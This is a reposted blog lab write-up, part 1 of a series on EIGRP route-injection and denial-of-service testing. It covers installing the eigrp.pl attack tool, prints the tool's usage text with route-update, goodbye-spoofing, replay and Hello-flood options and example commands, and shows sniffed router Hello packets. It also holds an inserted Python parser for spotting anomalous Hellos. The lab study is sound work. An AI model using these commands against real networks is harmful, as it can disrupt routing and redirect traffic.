EIGRP Malicious Route Injection and Denial-of-Service Attack Testing (Part 1)
This test again follows the basic topology from the article "OSPF Malicious Route Injection Attack Test"; the structure is shown below, and we will use host 36, the attack host, to inject malicious routes.
The dynamic routing protocol has already been switched to EIGRP and has fully converged.

A Perl script tool is needed to carry out this experiment; the files can be downloaded from the attachment. We again use Ubuntu as the attack platform.
After obtaining eigrp-tools.pl and unpacking it into any directory, you can see a very simple set of files:
-rwxrwxrwx 1 sc sc 1120 2005-12-19 06:58 eigrp.conf
-rwxrwxrwx 1 sc sc 36259 2005-12-19 06:58 eigrp.pl
-rwxrwxrwx 1 sc sc 1004 2005-12-19 07:00 MINI-README
A word of explanation: the .pl file is the main attack script, and the .conf file exists for the user's convenience, letting parameters be preset in a configuration file; whenever a parameter is not given on the pl command line, it is read from that file.
1. Checking the Perl script environment
When you get a script or source code, never expect it to work on the first try; first see what is missing.
root@sc-desktop:~/eigrp-tools# perl eigrp.pl
Can't locate Net/RawIp.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at eigrp.pl line 9.
BEGIN failed--compilation aborted at eigrp.pl line 9.
A word on the approach to solving the problem: ask Google for foreign matters and Gougou for domestic ones; this is a foreign matter, so we turn to Google.
Basically any question (except what your future wife will be called... though plenty of fortune-telling sites now seem to answer that too) has an answer, so the saying that the road is found by asking is right; the key is how to search. In my view, recursive searching is the most effective, and this case proves it.
No pretending here: I am a Perl novice too. In this experiment I only want to use this Perl script for network attack testing, not to study Perl itself, so the main problem has to stay in focus.
1. First search for the phrase "Can't locate Net/RawIp.pm in" to see whether there is a direct solution. The results are very fragmentary: people ask the same question, but every answer just says to install the module.
2. Next change direction and search for "perl install modular". Now there is plenty, with very detailed tutorials on how to install. We do not read the full tutorials, only the relevant examples among the Google results. I found a result of just a few sentences that mentioned cpan.
3. Immediately try cpan in bash; this gives a cpan[1]> prompt. Intuitively this is some kind of mode, similar to mysql>; typing help shows an install command.
4. Try it right away:
cpan[5]> install rawip
Warning: Cannot install rawip, don't know what it is.
Try the command
i /rawip/
to find objects with matching identifiers.
5. Good: although it does not understand what I want, it gives a hint; obviously it does not know the name, so do as the hint says:
cpan[6]> i /rawip/
Distribution SAPER/Net-RawIP-0.25.tar.gz
Module Net::RawIP (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::ethhdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::generichdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::icmphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::iphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::opt (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::tcphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::udphdr (SAPER/Net-RawIP-0.25.tar.gz)
9 items found
6. So I simply had not followed the local custom; do as the host does:
cpan[7]> install Net::RawIP
Running install for module 'Net::RawIP'
CPAN: Data::Dumper loaded ok (v2.121_14)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: LWP::UserAgent loaded ok (v5.810)
I would like to connect to one of the following sites to get 'authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz':
Is it OK to try to connect to the Internet? [yes]
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: Digest::SHA loaded ok (v5.45)
Checksum for /root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz ok
Scanning cache /root/.cpan/build for sizes
.............................(omitted).........................................
CPAN: File::Temp loaded ok (v0.18)
Warning (usually harmless): 'YAML' not installed, will not store persistent state
CPAN.pm: Going to build S/SA/SAPER/Net-RawIP-0.25.tar.gz
Compiler: cc
cc (Ubuntu 4.3.2-1ubuntu11) 4.3.2
Copyright © 2008 Free Software Foundation, Inc.
本程序是自由软件;请参看源代码的版权声明。本软件没有任何担保;
包括没有适销性和某一专用目的下的适用性担保。
Could not load the pcap library. Please see the README file on how
to install it. Be sure to also install the C headers (pcap.h).
Warning: No success on command[/usr/bin/perl Makefile.PL INSTALLDIRS=site]
Warning (usually harmless): 'YAML' not installed, will not store persistent state
SAPER/Net-RawIP-0.25.tar.gz
/usr/bin/perl Makefile.PL INSTALLDIRS=site -- NOT OK
Running make test
Make had some problems, won't test
Running make install
Make had some problems, won't install
Could not read '/root/.cpan/build/Net-RawIP-0.25-Yx2FXb/META.yml'. Falling back to other methods to determine prerequisites
Failed during this command:
SAPER/Net-RawIP-0.25.tar.gz : writemakefile NO '/usr/bin/perl Makefile.PL INSTALLDIRS=site' returned status 512
The install did not succeed, but it reported the problems: one is that YAML is not installed, the other is that pcap.h is missing; intuition says the latter is a system package.
7. Solve YAML first:
cpan[11]> install YAML
Running install for module 'YAML'
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/I/IN/INGY/CHECKSUMS
Checksum for /root/.cpan/sources/authors/id/I/IN/INGY/YAML-0.68.tar.gz ok
............................................................................DONE
Found 1 old build, restored the state of 1
Installed without problems.
8. Next search for pcap.h; you will see that the libpcap dev package needs to be installed. There is actually a shortcut here: since we already downloaded "/root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz", we can open the package and read its README, which also mentions the pcap.h requirement. Here apt-get install libpcap0.8-dev is all that is needed.
9. This time install Net::RawIP succeeds. Running the eigrp script again reports that NetPacket/Ethernet.pm is missing; look it up and install it the same way, and it completes without problems.
Solving problems this way is fairly fast, but the drawback is obvious too: it is street basketball, a complete body of knowledge is lacking, and you never form a full picture of Perl.
Now the environment is ready, and we can look at the script's impressive set of parameters:
root@sc-desktop:~/eigrp-tools# perl eigrp.pl
Using config file eigrp.conf...
eigrp.pl, , V 0.1
This program was originally created for the book "Hacking Exposed: Cisco Networks"
Authors Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs and comments
to info[dot]arhont.com
usage: eigrp.pl [--sniff] [ --iface=inteterface ] [--timeout=i]
Options:
--sniff Sniff eigrp packets
--iface Listen on an interface
--iflist List all available network interfaces
--source Source IP address
--dest Packet destination IP. Default multicast IP - 224.0.0.10
--timeout=n pcap init timeout (500 default)
--hello Send EIGRP HELLO
--update Update route
--query Send [Query] (Unreachable destination )
--external External route
--internal Internal route
--ipgoodbye=s IP to [Goodbye message] Authentification replay not implemented
--file2ip=s Send raw sniffed eigrp data from file to IP
--payback Sniff the UPDATE packet, change [Delay] and send it back (PoC)
--op=n EIGRP opcode number to trigger, capture a packet defined by the trigger to a disk
--sn=n EIGRP sequence number to trigger
--auth Authentication data for the reply atack (copy past hex from sniff)
--opcode Custom opcode for hello packets fuzzing
--flags=n EIGRP flags (0,1 or 2)
--version=n EIGRP version [8 bit integer] Default = 2
--as=n Autonomous system number, Default = 1
--k1=n Metric K1 Default 1
--k2=n Mertic K2 Default 0
--k3=n Mertic K3 Default 1
--k4=n Mertic K4 Default 0
--k5=n Mertic K4 Default 0
--mtu=n MTU
--nms=n Add NMS (Next multicast message) to Hello packet
--eigrpv=s EIGRP release version
--ios=s IOS version
--hopcount=n Hop count
--reliability=n Reliability
--load=n Load
--delay=n Delay
--sequence=n Sequence (32bit sequence) Default = 0
--ack=n Acknowledge (32bit sequence) Default = 0
--nexthop=s Next Hop
--bandwidth=n Bandwidth
--routedest=s Route destination
--origrouter=s Originating router
--origas=n Originating Autonomous system number
--arbitatag=n Arbitrary tag
--metric=n protocol metric (external EIGRP metric for the external updates)
--extproto=n External protocol ID IGRP(1) EIGRP(2) Static Route(3) RIP(4)
HELLO(5) OSPF(6) IS_IS(7) EGP(8) BGP(9) IDRP(10) Connected link(11)
--hold=n Hold time in seconds
--hellotime=n Hello send retries timeout. Default = 5 sec
--hellodos=s IP subnet. Warning! Nasty DOS atack ! Send HELLO EIGRP Argument from IP range.
--retries=n Packet send retries Default = 1;
Example :
./eigrp.pl --sniff --iface eth0
./eigrp.pl --ipgoodbye 192.168.66.202 --source 192.168.7.8
./eigrp.pl --file2ip update.dat --source 192.168.7.8
./eigrp.pl --update --external --as 65534 --source 192.168.7.8
./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
--source 192.168.77.8 --nms 1
./eigrp.pl --help This message
root@sc-desktop:~/eigrp-tools #
2. Probing the surrounding environment
Use the script's sniffing function to check the surroundings; in an unfamiliar environment this is a way to learn the topology.
root@sc-desktop:~/eigrp-tools# ./eigrp.pl --sniff --iface eth0
Using config file eigrp.conf...
./eigrp.pl, , V 0.1
Use of uninitialized value in subroutine entry at /usr/local/lib/perl/5.10.0/Net/RawIP.pm line 640.
Link Offset: 14..
Sniffing interface: eth0
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
***************************************************************
Source MAC:c2030d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.251 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
We can see the two EIGRP routers in the network, their EIGRP version and their IOS version.
Note from 水煮豆豆: the K values deserve special mention here. Many people who have studied EIGRP do not really understand them: Cisco went to great lengths to design five values and then advises users not to change them. A simple way to see it is that the K values exist as an advanced user parameter, to give more flexibility in network design; adjusting the five parameters makes it easy to choose between delay and stability, whether you want more stability or lower delay. That is all there is to it.
Now both the attacker and the routers under attack are ready, and the experiment can begin.
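To show what the sniffer output above actually decodes, here is an added Python parser (not part of the original post or of eigrp-tools) that takes the Hello hex dump shown above, recomputes the EIGRP checksum, extracts the K values, hold time and version TLVs, and reports where a Hello departs from an assumed lab baseline (AS 1, default K values, 15 s hold time); that comparison is how a monitoring script would notice a Hello that does not match the configured neighbours.

```python
import struct

# Hello packet copied from the sniffer hex dump above (router 192.168.1.249)
HELLO_HEX = ("02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 "
             "00 01 00 0c 01 00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02")
# Assumed baseline for this lab: AS 1, default K values, 15 second hold time
BASELINE = {"as": 1, "k": [1, 0, 1, 0, 0], "hold_time": 15}

def ones_complement_checksum(data: bytes) -> int:
    """IP-style one's-complement sum over 16-bit words; EIGRP uses the same."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_eigrp(pkt: bytes) -> dict:
    """Decode the 20-byte EIGRP header and the TLVs that follow it."""
    version, opcode, csum, flags, seq, ack, asn = struct.unpack("!BBHIIII", pkt[:20])
    # the checksum covers the whole EIGRP packet with the checksum field zeroed
    zeroed = pkt[:2] + b"\x00\x00" + pkt[4:]
    info = {"version": version, "opcode": opcode, "checksum": csum,
            "checksum_ok": ones_complement_checksum(zeroed) == csum,
            "flags": flags, "seq": seq, "ack": ack, "as": asn, "tlvs": {}}
    off = 20
    while off + 4 <= len(pkt):
        ttype, tlen = struct.unpack("!HH", pkt[off:off + 4])
        if tlen < 4 or off + tlen > len(pkt):
            raise ValueError("malformed TLV at offset %d" % off)
        body = pkt[off + 4:off + tlen]
        if ttype == 0x0001:      # EIGRP parameters: K1..K5, reserved, hold time
            info["tlvs"]["parameters"] = {"k": list(body[:5]),
                                          "hold_time": struct.unpack("!H", body[6:8])[0]}
        elif ttype == 0x0004:    # software version: IOS major.minor, EIGRP major.minor
            info["tlvs"]["software_version"] = {"ios": "%d.%d" % (body[0], body[1]),
                                                "eigrp": "%d.%d" % (body[2], body[3])}
        else:                    # anything else is kept raw for inspection
            info["tlvs"][hex(ttype)] = body.hex()
        off += tlen
    return info

def hello_deviations(info: dict, baseline: dict = BASELINE) -> list:
    """Names of the fields where a Hello departs from the expected neighbour settings."""
    params = info["tlvs"].get("parameters", {})
    checks = {"checksum": info["checksum_ok"],
              "as": info["as"] == baseline["as"],
              "k": params.get("k") == baseline["k"],
              "hold_time": params.get("hold_time") == baseline["hold_time"]}
    return [name for name, ok in checks.items() if not ok]
```

Running parse_eigrp(bytes.fromhex(HELLO_HEX)) reproduces the sniffer's reading (checksum 0xeecb correct, AS 1, K 1/0/1/0/0, hold time 15, IOS 12.4, EIGRP 1.2), and hello_deviations returns an empty list for it.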
Attachment: http://down.51cto.com/data/2351704
This article is reposted from the beansprouts 51CTO blog; original link: http://blog.51cto.com/netwalk/128210. To reprint it, please contact the original author yourself.